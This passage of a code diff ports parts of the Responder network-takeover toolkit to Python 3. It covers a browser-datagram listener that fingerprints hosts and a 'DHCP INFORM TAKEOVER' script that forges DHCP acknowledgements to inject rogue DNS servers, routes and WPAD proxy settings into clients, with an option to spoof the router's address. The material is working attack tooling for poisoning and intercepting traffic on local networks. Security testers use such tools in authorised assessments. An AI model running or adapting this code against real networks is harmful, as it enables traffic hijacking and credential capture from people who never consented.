-                self.ResponderConfigLogger.warning(Message)
-                self.ResponderConfigLogger.warning(str(self))
+		try:
+			NetworkCard = subprocess.check_output(["ifconfig", "-a"])
+		except:
+			try:
+				NetworkCard = subprocess.check_output(["ip", "address", "show"])
+			except subprocess.CalledProcessError as ex:
+				NetworkCard = "Error fetching Network Interfaces:", ex
+				pass
+		try:
+			DNS = subprocess.check_output(["cat", "/etc/resolv.conf"])
+		except subprocess.CalledProcessError as ex:
+			DNS = "Error fetching DNS configuration:", ex
+			pass
+		try:
+			RoutingInfo = subprocess.check_output(["netstat", "-rn"])
+		except:
+			try:
+				RoutingInfo = subprocess.check_output(["ip", "route", "show"])
+			except subprocess.CalledProcessError as ex:
+				RoutingInfo = "Error fetching Routing information:", ex
+				pass
+
+		Message = "Current environment is:\nNetwork Config:\n%s\nDNS Settings:\n%s\nRouting info:\n%s\n\n"%(NetworkCard,DNS,RoutingInfo)
+		try:
+			utils.DumpConfig(self.ResponderConfigDump, Message)
+			utils.DumpConfig(self.ResponderConfigDump,str(self))
+		except AttributeError as ex:
+			print("Missing Module:", ex)
+			pass

 def init():
 	global Config
--- a/tools/BrowserListener.py
+++ b/tools/BrowserListener.py
@@ -1,5 +1,5 @@
 #!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools 
+# This file is part of Responder, a network take-over set of tools
 # created and maintained by Laurent Gaffie.
 # email: laurent.gaffie@gmail.com
 # This program is free software: you can redistribute it and/or modify
@@ -16,103 +16,103 @@
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 import sys
 import os
-import thread
+import _thread

 BASEDIR = os.path.realpath(os.path.join(os.path.dirname(__file__), '..'))
 sys.path.insert(0, BASEDIR)

 from servers.Browser import WorkstationFingerPrint, RequestType, RAPThisDomain, RapFinger
-from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler
+from socketserver import UDPServer, ThreadingMixIn, BaseRequestHandler
 from threading import Lock
 from utils import *

 def ParseRoles(data):
-	if len(data) != 4:
-		return ''
+    if len(data) != 4:
+        return ''

-	AllRoles = {
-		'Workstation':           (ord(data[0]) >> 0) & 1,
-		'Server':                (ord(data[0]) >> 1) & 1,
-		'SQL':                   (ord(data[0]) >> 2) & 1,
-		'Domain Controller':     (ord(data[0]) >> 3) & 1,
-		'Backup Controller':     (ord(data[0]) >> 4) & 1,
-		'Time Source':           (ord(data[0]) >> 5) & 1,
-		'Apple':                 (ord(data[0]) >> 6) & 1,
-		'Novell':                (ord(data[0]) >> 7) & 1,
-		'Member':                (ord(data[1]) >> 0) & 1,
-		'Print':                 (ord(data[1]) >> 1) & 1,
-		'Dialin':                (ord(data[1]) >> 2) & 1,
-		'Xenix':                 (ord(data[1]) >> 3) & 1,
-		'NT Workstation':        (ord(data[1]) >> 4) & 1,
-		'WfW':                   (ord(data[1]) >> 5) & 1,
-		'Unused':                (ord(data[1]) >> 6) & 1,
-		'NT Server':             (ord(data[1]) >> 7) & 1,
-		'Potential Browser':     (ord(data[2]) >> 0) & 1,
-		'Backup Browser':        (ord(data[2]) >> 1) & 1,
-		'Master Browser':        (ord(data[2]) >> 2) & 1,
-		'Domain Master Browser': (ord(data[2]) >> 3) & 1,
-		'OSF':                   (ord(data[2]) >> 4) & 1,
-		'VMS':                   (ord(data[2]) >> 5) & 1,
-		'Windows 95+':           (ord(data[2]) >> 6) & 1,
-		'DFS':                   (ord(data[2]) >> 7) & 1,
-		'Local':                 (ord(data[3]) >> 6) & 1,
-		'Domain Enum':           (ord(data[3]) >> 7) & 1,
-	}
+    AllRoles = {
+            'Workstation':           (ord(data[0]) >> 0) & 1,
+            'Server':                (ord(data[0]) >> 1) & 1,
+            'SQL':                   (ord(data[0]) >> 2) & 1,
+            'Domain Controller':     (ord(data[0]) >> 3) & 1,
+            'Backup Controller':     (ord(data[0]) >> 4) & 1,
+            'Time Source':           (ord(data[0]) >> 5) & 1,
+            'Apple':                 (ord(data[0]) >> 6) & 1,
+            'Novell':                (ord(data[0]) >> 7) & 1,
+            'Member':                (ord(data[1]) >> 0) & 1,
+            'Print':                 (ord(data[1]) >> 1) & 1,
+            'Dialin':                (ord(data[1]) >> 2) & 1,
+            'Xenix':                 (ord(data[1]) >> 3) & 1,
+            'NT Workstation':        (ord(data[1]) >> 4) & 1,
+            'WfW':                   (ord(data[1]) >> 5) & 1,
+            'Unused':                (ord(data[1]) >> 6) & 1,
+            'NT Server':             (ord(data[1]) >> 7) & 1,
+            'Potential Browser':     (ord(data[2]) >> 0) & 1,
+            'Backup Browser':        (ord(data[2]) >> 1) & 1,
+            'Master Browser':        (ord(data[2]) >> 2) & 1,
+            'Domain Master Browser': (ord(data[2]) >> 3) & 1,
+            'OSF':                   (ord(data[2]) >> 4) & 1,
+            'VMS':                   (ord(data[2]) >> 5) & 1,
+            'Windows 95+':           (ord(data[2]) >> 6) & 1,
+            'DFS':                   (ord(data[2]) >> 7) & 1,
+            'Local':                 (ord(data[3]) >> 6) & 1,
+            'Domain Enum':           (ord(data[3]) >> 7) & 1,
+    }

-	return ', '.join(k for k,v in AllRoles.items() if v == 1)
+    return ', '.join(k for k,v in list(AllRoles.items()) if v == 1)


 class BrowserListener(BaseRequestHandler):
-	def handle(self):
-		data, socket = self.request
+    def handle(self):
+        data, socket = self.request

-		lock = Lock()
-		lock.acquire()
+        lock = Lock()
+        lock.acquire()

-		DataOffset    = struct.unpack('<H',data[139:141])[0]
-		BrowserPacket = data[82+DataOffset:]
-		ReqType       = RequestType(BrowserPacket[0])
+        DataOffset    = struct.unpack('<H',data[139:141])[0]
+        BrowserPacket = data[82+DataOffset:]
+        ReqType       = RequestType(BrowserPacket[0])

-		Domain = Decode_Name(data[49:81])
-		Name   = Decode_Name(data[15:47])
-		Role1  = NBT_NS_Role(data[45:48])
-		Role2  = NBT_NS_Role(data[79:82])
-		Fprint = WorkstationFingerPrint(data[190:192])
-		Roles  = ParseRoles(data[192:196])
+        Domain = Decode_Name(data[49:81])
+        Name   = Decode_Name(data[15:47])
+        Role1  = NBT_NS_Role(data[45:48])
+        Role2  = NBT_NS_Role(data[79:82])
+        Fprint = WorkstationFingerPrint(data[190:192])
+        Roles  = ParseRoles(data[192:196])

-		print text("[BROWSER] Request Type : %s" % ReqType)
-		print text("[BROWSER] Address      : %s" % self.client_address[0])
-		print text("[BROWSER] Domain       : %s" % Domain)
-		print text("[BROWSER] Name         : %s" % Name)
-		print text("[BROWSER] Main Role    : %s" % Role1)
-		print text("[BROWSER] 2nd Role     : %s" % Role2)
-		print text("[BROWSER] Fingerprint  : %s" % Fprint)
-		print text("[BROWSER] Role List    : %s" % Roles)
+        print(text("[BROWSER] Request Type : %s" % ReqType))
+        print(text("[BROWSER] Address      : %s" % self.client_address[0]))
+        print(text("[BROWSER] Domain       : %s" % Domain))
+        print(text("[BROWSER] Name         : %s" % Name))
+        print(text("[BROWSER] Main Role    : %s" % Role1))
+        print(text("[BROWSER] 2nd Role     : %s" % Role2))
+        print(text("[BROWSER] Fingerprint  : %s" % Fprint))
+        print(text("[BROWSER] Role List    : %s" % Roles))

-		RAPThisDomain(self.client_address[0], Domain)
+        RAPThisDomain(self.client_address[0], Domain)

-		lock.release()
+        lock.release()


 class ThreadingUDPServer(ThreadingMixIn, UDPServer):
-	def server_bind(self):
-		self.allow_reuse_address = 1
-		UDPServer.server_bind(self)
+    def server_bind(self):
+        self.allow_reuse_address = 1
+        UDPServer.server_bind(self)

 def serve_thread_udp_broadcast(host, port, handler):
-	try:
-		server = ThreadingUDPServer(('', port), handler)
-		server.serve_forever()
-	except:
-		print "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
+    try:
+        server = ThreadingUDPServer(('', port), handler)
+        server.serve_forever()
+    except:
+        print("Error starting UDP server on port " + str(port) + ", check permissions or other servers running.")

 if __name__ == "__main__":
-	try:
-		print "Listening for BROWSER datagrams..."
-		thread.start_new(serve_thread_udp_broadcast,('', 138,  BrowserListener))
+    try:
+        print("Listening for BROWSER datagrams...")
+        _thread.start_new(serve_thread_udp_broadcast,('', 138,  BrowserListener))

-		while True:
-			time.sleep(1)
+        while True:
+            time.sleep(1)

-	except KeyboardInterrupt:
-		sys.exit("\r Exiting...")
+    except KeyboardInterrupt:
+        sys.exit("\r Exiting...")
--- a/tools/DHCP.py
+++ b/tools/DHCP.py
@@ -1,5 +1,5 @@
 #!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools 
+# This file is part of Responder, a network take-over set of tools
 # created and maintained by Laurent Gaffie.
 # email: laurent.gaffie@gmail.com
 # This program is free software: you can redistribute it and/or modify
@@ -15,15 +15,16 @@
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 import sys
+if (sys.version_info < (3, 0)):
+   sys.exit('This script is meant to be run with Python3')
 import struct
 import optparse
-import ConfigParser
+import configparser
 import os
-
+import codecs
 BASEDIR = os.path.realpath(os.path.join(os.path.dirname(__file__), '..'))
 sys.path.insert(0, BASEDIR)
 from odict import OrderedDict
-from packets import Packet
 from utils import *

 parser = optparse.OptionParser(usage='python %prog -I eth0 -d pwned.com -p 10.20.30.40 -s 10.20.30.1 -r 10.20.40.1', prog=sys.argv[0],)
@@ -39,42 +40,81 @@ parser.add_option('-R',                 action="store_true", help="Respond to DH
 options, args = parser.parse_args()

 def color(txt, code = 1, modifier = 0):
-	return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
+    return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)

 if options.Interface is None:
-	print color("[!]", 1, 1), "-I mandatory option is missing, please provide an interface."
-	exit(-1)
+    print(color("[!]", 1, 1), "-I mandatory option is missing, please provide an interface.")
+    exit(-1)
 elif options.RouterIP is None:
-	print color("[!]", 1, 1), "-r mandatory option is missing, please provide the router's IP."
-	exit(-1)
+    print(color("[!]", 1, 1), "-r mandatory option is missing, please provide the router's IP.")
+    exit(-1)
 elif options.DNSIP is None:
-	print color("[!]", 1, 1), "-p mandatory option is missing, please provide the primary DNS server ip address or yours."
-	exit(-1)
+    print(color("[!]", 1, 1), "-p mandatory option is missing, please provide the primary DNS server ip address or yours.")
+    exit(-1)
 elif options.DNSIP2 is None:
-	print color("[!]", 1, 1), "-s mandatory option is missing, please provide the secondary DNS server ip address or yours."
-	exit(-1)
+    print(color("[!]", 1, 1), "-s mandatory option is missing, please provide the secondary DNS server ip address or yours.")
+    exit(-1)

+#Python version
+if (sys.version_info > (3, 0)):
+    PY2OR3     = "PY3"
+else:
+    PY2OR3  = "PY2"

-print '#############################################################################'
-print '##                       DHCP INFORM TAKEOVER 0.2                          ##'
-print '##                                                                         ##'
-print '##        By default, this script will only inject a new DNS/WPAD          ##'
-print '##                server to a Windows <= XP/2003 machine.                  ##'
-print '##                                                                         ##'
-print '##     To inject a DNS server/domain/route on a Windows >= Vista and       ##'
-print '##               any linux box, use -R (can be noisy)                      ##'
-print '##                                                                         ##'
-print '##   Use `RespondTo` setting in Responder.conf for in-scope targets only.  ##'
-print '#############################################################################'
-print ''
-print color('[*]', 2, 1), 'Listening for events...'
+def StructWithLenPython2or3(endian,data):
+    #Python2...
+    if PY2OR3 == "PY2":
+        return struct.pack(endian, data)
+    #Python3...
+    else:
+        return struct.pack(endian, data).decode('latin-1')

-config = ConfigParser.ConfigParser()
+def NetworkSendBufferPython2or3(data):
+    if PY2OR3 == "PY2":
+        return str(data)
+    else:
+        return bytes(str(data), 'latin-1')
+
+def NetworkRecvBufferPython2or3(data):
+    if PY2OR3 == "PY2":
+        return str(data)
+    else:
+        return str(data.decode('latin-1'))
+
+class Packet():
+	fields = OrderedDict([
+		("data", ""),
+	])
+	def __init__(self, **kw):
+		self.fields = OrderedDict(self.__class__.fields)
+		for k,v in kw.items():
+			if callable(v):
+				self.fields[k] = v(self.fields[k])
+			else:
+				self.fields[k] = v
+	def __str__(self):
+		return "".join(map(str, self.fields.values()))
+
+print('#############################################################################')
+print('##                       DHCP INFORM TAKEOVER 0.3                          ##')
+print('##                                                                         ##')
+print('##        By default, this script will only inject a new DNS/WPAD          ##')
+print('##                server to a Windows <= XP/2003 machine.                  ##')
+print('##                                                                         ##')
+print('##     To inject a DNS server/domain/route on a Windows >= Vista and       ##')
+print('##               any linux box, use -R (can be noisy)                      ##')
+print('##                                                                         ##')
+print('##   Use `RespondTo` setting in Responder.conf for in-scope targets only.  ##')
+print('#############################################################################')
+print('')
+print(color('[*]', 2, 1), 'Listening for events...')
+
+config = configparser.ConfigParser()
 config.read(os.path.join(BASEDIR,'Responder.conf'))
-RespondTo           = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')])
-DontRespondTo       = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')])
+RespondTo           = [_f for _f in [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')] if _f]
+DontRespondTo       = [_f for _f in [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')] if _f]
 Interface           = options.Interface
-Responder_IP        = FindLocalIP(Interface)
+Responder_IP        = FindLocalIP(Interface, None)
 ROUTERIP            = options.RouterIP
 NETMASK             = options.Netmask
 DHCPSERVER          = Responder_IP
@@ -86,233 +126,235 @@ Spoof               = options.Spoof
 Respond_To_Requests = options.Respond_To_Requests

 if Spoof:
-	DHCPSERVER = ROUTERIP
+    DHCPSERVER = ROUTERIP

 ##### IP Header #####
 class IPHead(Packet):
-	fields = OrderedDict([
-		("Version",           "\x45"),
-		("DiffServices",      "\x00"),
-		("TotalLen",          "\x00\x00"),
-		("Ident",             "\x00\x00"),
-		("Flags",             "\x00\x00"),
-		("TTL",               "\x40"),
-		("Protocol",          "\x11"),
-		("Checksum",          "\x00\x00"),
-		("SrcIP",             ""),
-		("DstIP",             ""),
-	])
+    fields = OrderedDict([
+            ("Version",           "\x45"),
+            ("DiffServices",      "\x00"),
+            ("TotalLen",          "\x00\x00"),
+            ("Ident",             "\x00\x00"),
+            ("Flags",             "\x00\x00"),
+            ("TTL",               "\x40"),
+            ("Protocol",          "\x11"),
+            ("Checksum",          "\x00\x00"),
+            ("SrcIP",             ""),
+            ("DstIP",             ""),
+    ])

 class UDP(Packet):
-	fields = OrderedDict([
-		("SrcPort",           "\x00\x43"),
-		("DstPort",           "\x00\x44"),
-		("Len",               "\x00\x00"),
-		("Checksum",          "\x00\x00"),
-		("Data",              "\x00\x00"),
-	])
+    fields = OrderedDict([
+            ("SrcPort",           "\x00\x43"),
+            ("DstPort",           "\x00\x44"),
+            ("Len",               "\x00\x00"),
+            ("Checksum",          "\x00\x00"),
+            ("Data",              "\x00\x00"),
+    ])

-	def calculate(self):
-		self.fields["Len"] = struct.pack(">h",len(str(self.fields["Data"]))+8)
+    def calculate(self):
+        self.fields["Len"] = StructWithLenPython2or3(">h",len(str(self.fields["Data"]))+8)

 class DHCPACK(Packet):
-	fields = OrderedDict([
-		("MessType",          "\x02"),
-		("HdwType",           "\x01"),
-		("HdwLen",            "\x06"),
-		("Hops",              "\x00"),
-		("Tid",               "\x11\x22\x33\x44"),
-		("ElapsedSec",        "\x00\x00"),
-		("BootpFlags",        "\x00\x00"),
-		("ActualClientIP",    "\x00\x00\x00\x00"),
-		("GiveClientIP",      "\x00\x00\x00\x00"),
-		("NextServerIP",      "\x00\x00\x00\x00"),
-		("RelayAgentIP",      "\x00\x00\x00\x00"),
-		("ClientMac",         "\xff\xff\xff\xff\xff\xff"),
-		("ClientMacPadding",  "\x00" *10),
-		("ServerHostname",    "\x00" * 64),
-		("BootFileName",      "\x00" * 128),
-		("MagicCookie",       "\x63\x82\x53\x63"),
-		("DHCPCode",          "\x35"),              #DHCP Message
-		("DHCPCodeLen",       "\x01"),
-		("DHCPOpCode",        "\x05"),              #Msgtype(ACK)
-		("Op54",              "\x36"),
-		("Op54Len",           "\x04"),
-		("Op54Str",           ""),                  #DHCP Server
-		("Op51",              "\x33"),
-		("Op51Len",           "\x04"),
-		("Op51Str",           "\x00\x01\x51\x80"),  #Lease time, 1 day
-		("Op1",               "\x01"),
-		("Op1Len",            "\x04"),
-		("Op1Str",            ""),                  #Netmask
-		("Op15",              "\x0f"),
-		("Op15Len",           "\x0e"),
-		("Op15Str",           ""),                  #DNS Name
-		("Op3",               "\x03"),
-		("Op3Len",            "\x04"),
-		("Op3Str",            ""),                  #Router
-		("Op6",               "\x06"),
-		("Op6Len",            "\x08"),
-		("Op6Str",            ""),                  #DNS Servers
-		("Op252",             "\xfc"),
-		("Op252Len",          "\x04"),
-		("Op252Str",          ""),                  #Wpad Server
-		("Op255",             "\xff"),
-		("Padding",           "\x00"),
-	])
+    fields = OrderedDict([
+            ("MessType",          "\x02"),
+            ("HdwType",           "\x01"),
+            ("HdwLen",            "\x06"),
+            ("Hops",              "\x00"),
+            ("Tid",               "\x11\x22\x33\x44"),
+            ("ElapsedSec",        "\x00\x00"),
+            ("BootpFlags",        "\x00\x00"),
+            ("ActualClientIP",    "\x00\x00\x00\x00"),
+            ("GiveClientIP",      "\x00\x00\x00\x00"),
+            ("NextServerIP",      "\x00\x00\x00\x00"),
+            ("RelayAgentIP",      "\x00\x00\x00\x00"),
+            ("ClientMac",         "\xff\xff\xff\xff\xff\xff"),
+            ("ClientMacPadding",  "\x00" *10),
+            ("ServerHostname",    "\x00" * 64),
+            ("BootFileName",      "\x00" * 128),
+            ("MagicCookie",       "\x63\x82\x53\x63"),
+            ("DHCPCode",          "\x35"),              #DHCP Message
+            ("DHCPCodeLen",       "\x01"),
+            ("DHCPOpCode",        "\x05"),              #Msgtype(ACK)
+            ("Op54",              "\x36"),
+            ("Op54Len",           "\x04"),
+            ("Op54Str",           ""),                  #DHCP Server
+            ("Op51",              "\x33"),
+            ("Op51Len",           "\x04"),
+            ("Op51Str",           "\x00\x01\x51\x80"),  #Lease time, 1 day
+            ("Op1",               "\x01"),
+            ("Op1Len",            "\x04"),
+            ("Op1Str",            ""),                  #Netmask
+            ("Op15",              "\x0f"),
+            ("Op15Len",           "\x0e"),
+            ("Op15Str",           ""),                  #DNS Name
+            ("Op3",               "\x03"),
+            ("Op3Len",            "\x04"),
+            ("Op3Str",            ""),                  #Router
+            ("Op6",               "\x06"),
+            ("Op6Len",            "\x08"),
+            ("Op6Str",            ""),                  #DNS Servers
+            ("Op252",             "\xfc"),
+            ("Op252Len",          "\x04"),
+            ("Op252Str",          ""),                  #Wpad Server
+            ("Op255",             "\xff"),
+            ("Padding",           "\x00"),
+    ])

-	def calculate(self):
-		self.fields["Op54Str"]  = socket.inet_aton(DHCPSERVER)
-		self.fields["Op1Str"]   = socket.inet_aton(NETMASK)
-		self.fields["Op3Str"]   = socket.inet_aton(ROUTERIP)
-		self.fields["Op6Str"]   = socket.inet_aton(DNSIP)+socket.inet_aton(DNSIP2)
-		self.fields["Op15Str"]  = DNSNAME
-		self.fields["Op252Str"] = WPADSRV
-		self.fields["Op15Len"]  = struct.pack(">b",len(str(self.fields["Op15Str"])))
-		self.fields["Op252Len"] = struct.pack(">b",len(str(self.fields["Op252Str"])))
+    def calculate(self):
+        self.fields["Op54Str"]  = socket.inet_aton(DHCPSERVER).decode('latin-1')
+        self.fields["Op1Str"]   = socket.inet_aton(NETMASK).decode('latin-1')
+        self.fields["Op3Str"]   = socket.inet_aton(ROUTERIP).decode('latin-1')
+        self.fields["Op6Str"]   = socket.inet_aton(DNSIP).decode('latin-1')+socket.inet_aton(DNSIP2).decode('latin-1')
+        self.fields["Op15Str"]  = DNSNAME
+        self.fields["Op252Str"] = WPADSRV
+        self.fields["Op15Len"]  = StructWithLenPython2or3(">b",len(str(self.fields["Op15Str"])))
+        self.fields["Op252Len"] = StructWithLenPython2or3(">b",len(str(self.fields["Op252Str"])))

 class DHCPInformACK(Packet):
-	fields = OrderedDict([
-		("MessType",          "\x02"),
-		("HdwType",           "\x01"),
-		("HdwLen",            "\x06"),
-		("Hops",              "\x00"),
-		("Tid",               "\x11\x22\x33\x44"),
-		("ElapsedSec",        "\x00\x00"),
-		("BootpFlags",        "\x00\x00"),
-		("ActualClientIP",    "\x00\x00\x00\x00"),
-		("GiveClientIP",      "\x00\x00\x00\x00"),
-		("NextServerIP",      "\x00\x00\x00\x00"),
-		("RelayAgentIP",      "\x00\x00\x00\x00"),
-		("ClientMac",         "\xff\xff\xff\xff\xff\xff"),
-		("ClientMacPadding",  "\x00" *10),
-		("ServerHostname",    "\x00" * 64),
-		("BootFileName",      "\x00" * 128),
-		("MagicCookie",       "\x63\x82\x53\x63"),
-		("Op53",              "\x35\x01\x05"),      #Msgtype(ACK)
-		("Op54",              "\x36"),
-		("Op54Len",           "\x04"),
-		("Op54Str",           ""),                  #DHCP Server
-		("Op1",               "\x01"),
-		("Op1Len",            "\x04"),
-		("Op1Str",            ""),                  #Netmask
-		("Op15",              "\x0f"),
-		("Op15Len",           "\x0e"),
-		("Op15Str",           ""),                  #DNS Name
-		("Op3",               "\x03"),
-		("Op3Len",            "\x04"),
-		("Op3Str",            ""),                  #Router
-		("Op6",               "\x06"),
-		("Op6Len",            "\x08"),
-		("Op6Str",            ""),                  #DNS Servers
-		("Op252",             "\xfc"),
-		("Op252Len",          "\x04"),
-		("Op252Str",          ""),                  #Wpad Server.
-		("Op255",             "\xff"),
-	])
+    fields = OrderedDict([
+            ("MessType",          "\x02"),
+            ("HdwType",           "\x01"),
+            ("HdwLen",            "\x06"),
+            ("Hops",              "\x00"),
+            ("Tid",               "\x11\x22\x33\x44"),
+            ("ElapsedSec",        "\x00\x00"),
+            ("BootpFlags",        "\x00\x00"),
+            ("ActualClientIP",    "\x00\x00\x00\x00"),
+            ("GiveClientIP",      "\x00\x00\x00\x00"),
+            ("NextServerIP",      "\x00\x00\x00\x00"),
+            ("RelayAgentIP",      "\x00\x00\x00\x00"),
+            ("ClientMac",         "\xff\xff\xff\xff\xff\xff"),
+            ("ClientMacPadding",  "\x00" *10),
+            ("ServerHostname",    "\x00" * 64),
+            ("BootFileName",      "\x00" * 128),
+            ("MagicCookie",       "\x63\x82\x53\x63"),
+            ("Op53",              "\x35\x01\x05"),      #Msgtype(ACK)
+            ("Op54",              "\x36"),
+            ("Op54Len",           "\x04"),
+            ("Op54Str",           ""),                  #DHCP Server
+            ("Op1",               "\x01"),
+            ("Op1Len",            "\x04"),
+            ("Op1Str",            ""),                  #Netmask
+            ("Op15",              "\x0f"),
+            ("Op15Len",           "\x0e"),
+            ("Op15Str",           ""),                  #DNS Name
+            ("Op3",               "\x03"),
+            ("Op3Len",            "\x04"),
+            ("Op3Str",            ""),                  #Router
+            ("Op6",               "\x06"),
+            ("Op6Len",            "\x08"),
+            ("Op6Str",            ""),                  #DNS Servers
+            ("Op252",             "\xfc"),
+            ("Op252Len",          "\x04"),
+            ("Op252Str",          ""),                  #Wpad Server.
+            ("Op255",             "\xff"),
+    ])

-	def calculate(self):
-		self.fields["Op54Str"]  = socket.inet_aton(DHCPSERVER)
-		self.fields["Op1Str"]   = socket.inet_aton(NETMASK)
-		self.fields["Op3Str"]   = socket.inet_aton(ROUTERIP)
-		self.fields["Op6Str"]   = socket.inet_aton(DNSIP)+socket.inet_aton(DNSIP2)
-		self.fields["Op15Str"]  = DNSNAME
-		self.fields["Op252Str"] = WPADSRV
-		self.fields["Op15Len"]  = struct.pack(">b",len(str(self.fields["Op15Str"])))
-		self.fields["Op252Len"] = struct.pack(">b",len(str(self.fields["Op252Str"])))
+    def calculate(self):
+        self.fields["Op54Str"]  = socket.inet_aton(DHCPSERVER).decode('latin-1')
+        self.fields["Op1Str"]   = socket.inet_aton(NETMASK).decode('latin-1')
+        self.fields["Op3Str"]   = socket.inet_aton(ROUTERIP).decode('latin-1')
+        self.fields["Op6Str"]   = socket.inet_aton(DNSIP).decode('latin-1')+socket.inet_aton(DNSIP2).decode('latin-1')
+        self.fields["Op15Str"]  = DNSNAME
+        self.fields["Op252Str"] = WPADSRV
+        self.fields["Op15Len"]  = StructWithLenPython2or3(">b",len(str(self.fields["Op15Str"])))
+        self.fields["Op252Len"] = StructWithLenPython2or3(">b",len(str(self.fields["Op252Str"])))

 def SpoofIP(Spoof):
-	return ROUTERIP if Spoof else Responder_IP
+    return ROUTERIP if Spoof else Responder_IP

 def RespondToThisIP(ClientIp):
-	if ClientIp.startswith('127.0.0.'):
-		return False
-	elif RespondTo and ClientIp not in RespondTo:
-		return False
-	elif ClientIp in RespondTo or RespondTo == []:
-		if ClientIp not in DontRespondTo:
-			return True
-	return False
+    if ClientIp.startswith('127.0.0.'):
+        return False
+    elif RespondTo and ClientIp not in RespondTo:
+        return False
+    elif ClientIp in RespondTo or RespondTo == []:
+        if ClientIp not in DontRespondTo:
+            return True
+    return False

 def ParseSrcDSTAddr(data):
-	SrcIP = socket.inet_ntoa(data[0][26:30])
-	DstIP = socket.inet_ntoa(data[0][30:34])
-	SrcPort = struct.unpack('>H',data[0][34:36])[0]
-	DstPort = struct.unpack('>H',data[0][36:38])[0]
-	return SrcIP, SrcPort, DstIP, DstPort
+    SrcIP = socket.inet_ntoa(data[0][26:30])
+    DstIP = socket.inet_ntoa(data[0][30:34])
+    SrcPort = struct.unpack('>H',data[0][34:36])[0]
+    DstPort = struct.unpack('>H',data[0][36:38])[0]
+    return SrcIP, SrcPort, DstIP, DstPort

 def FindIP(data):
-	IP = ''.join(re.findall(r'(?<=\x32\x04)[^EOF]*', data))
-	return ''.join(IP[0:4])
+    data = data.decode('latin-1')
+    IP = ''.join(re.findall(r'(?<=\x32\x04)[^EOF]*', data))
+    return ''.join(IP[0:4]).encode('latin-1')

 def ParseDHCPCode(data):
-	PTid        = data[4:8]
-	Seconds     = data[8:10]
-	CurrentIP   = socket.inet_ntoa(data[12:16])
-	RequestedIP = socket.inet_ntoa(data[16:20])
-	MacAddr     = data[28:34]
-	MacAddrStr  = ':'.join('%02x' % ord(m) for m in MacAddr).upper()
-	OpCode      = data[242:243]
-	RequestIP   = data[245:249]
+    PTid        = data[4:8]
+    Seconds     = data[8:10]
+    CurrentIP   = socket.inet_ntoa(data[12:16])
+    RequestedIP = socket.inet_ntoa(data[16:20])
+    MacAddr     = data[28:34]
+    MacAddrStr  = ':'.join('%02x' % ord(m) for m in MacAddr.decode('latin-1')).upper()
+    OpCode      = data[242:243]
+    RequestIP   = data[245:249]

-	# DHCP Inform
-	if OpCode == "\x08": 
-		IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)), DstIP=socket.inet_aton(CurrentIP))
-		Packet = DHCPInformACK(Tid=PTid, ClientMac=MacAddr, ActualClientIP=socket.inet_aton(CurrentIP),
-								GiveClientIP=socket.inet_aton("0.0.0.0"),
-								NextServerIP=socket.inet_aton("0.0.0.0"),
-								RelayAgentIP=socket.inet_aton("0.0.0.0"),
-								ElapsedSec=Seconds)
-		Packet.calculate()
-		Buffer = UDP(Data = Packet)
-		Buffer.calculate()
-		SendDHCP(str(IP_Header)+str(Buffer), (CurrentIP, 68))
-		return 'Acknowledged DHCP Inform for IP: %s, Req IP: %s, MAC: %s Tid: %s' % (CurrentIP, RequestedIP, MacAddrStr, '0x'+PTid.encode('hex'))
-	elif OpCode == "\x03" and Respond_To_Requests:  # DHCP Request
-		IP = FindIP(data)
-		if IP:
-			IPConv = socket.inet_ntoa(IP)
-			if RespondToThisIP(IPConv):
-				IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)), DstIP=IP)
-				Packet = DHCPACK(Tid=PTid, ClientMac=MacAddr, GiveClientIP=IP, ElapsedSec=Seconds)
-				Packet.calculate()
-				Buffer = UDP(Data = Packet)
-				Buffer.calculate()
-				SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 68))
-				return 'Acknowledged DHCP Request for IP: %s, Req IP: %s, MAC: %s Tid: %s' % (CurrentIP, RequestedIP, MacAddrStr, '0x'+PTid.encode('hex'))
-	elif OpCode == "\x01" and Respond_To_Requests:  # DHCP Discover
-		IP = FindIP(data)
-		if IP:
-			IPConv = socket.inet_ntoa(IP)
-			if RespondToThisIP(IPConv):
-				IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)), DstIP=IP)
-				Packet = DHCPACK(Tid=PTid, ClientMac=MacAddr, GiveClientIP=IP, DHCPOpCode="\x02", ElapsedSec=Seconds)
-				Packet.calculate()
-				Buffer = UDP(Data = Packet)
-				Buffer.calculate()
-				SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 0))
-				return 'Acknowledged DHCP Discover for IP: %s, Req IP: %s, MAC: %s Tid: %s' % (CurrentIP, RequestedIP, MacAddrStr, '0x'+PTid.encode('hex'))
+    # DHCP Inform
+    if OpCode == b"\x08":
+        IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)).decode('latin-1'), DstIP=socket.inet_aton(CurrentIP))
+        Packet = DHCPInformACK(Tid=PTid.decode('latin-1'), ClientMac=MacAddr.decode('latin-1'), ActualClientIP=socket.inet_aton(CurrentIP).decode('latin-1'),
+                                                        GiveClientIP=socket.inet_aton("0.0.0.0").decode('latin-1'),
+                                                        NextServerIP=socket.inet_aton("0.0.0.0").decode('latin-1'),
+                                                        RelayAgentIP=socket.inet_aton("0.0.0.0").decode('latin-1'),
+                                                        ElapsedSec=Seconds.decode('latin-1'))
+        Packet.calculate()
+        Buffer = UDP(Data = Packet)
+        Buffer.calculate()
+        SendDHCP(str(IP_Header)+str(Buffer), (CurrentIP, 68))
+        return 'Acknowledged DHCP Inform for IP: %s, Req IP: %s, MAC: %s' % (CurrentIP, RequestedIP, MacAddrStr)
+
+    elif OpCode == b"\x03" and Respond_To_Requests:  # DHCP Request
+        IP = FindIP(data)
+        if IP:
+            IPConv = socket.inet_ntoa(IP)
+            if RespondToThisIP(IPConv):
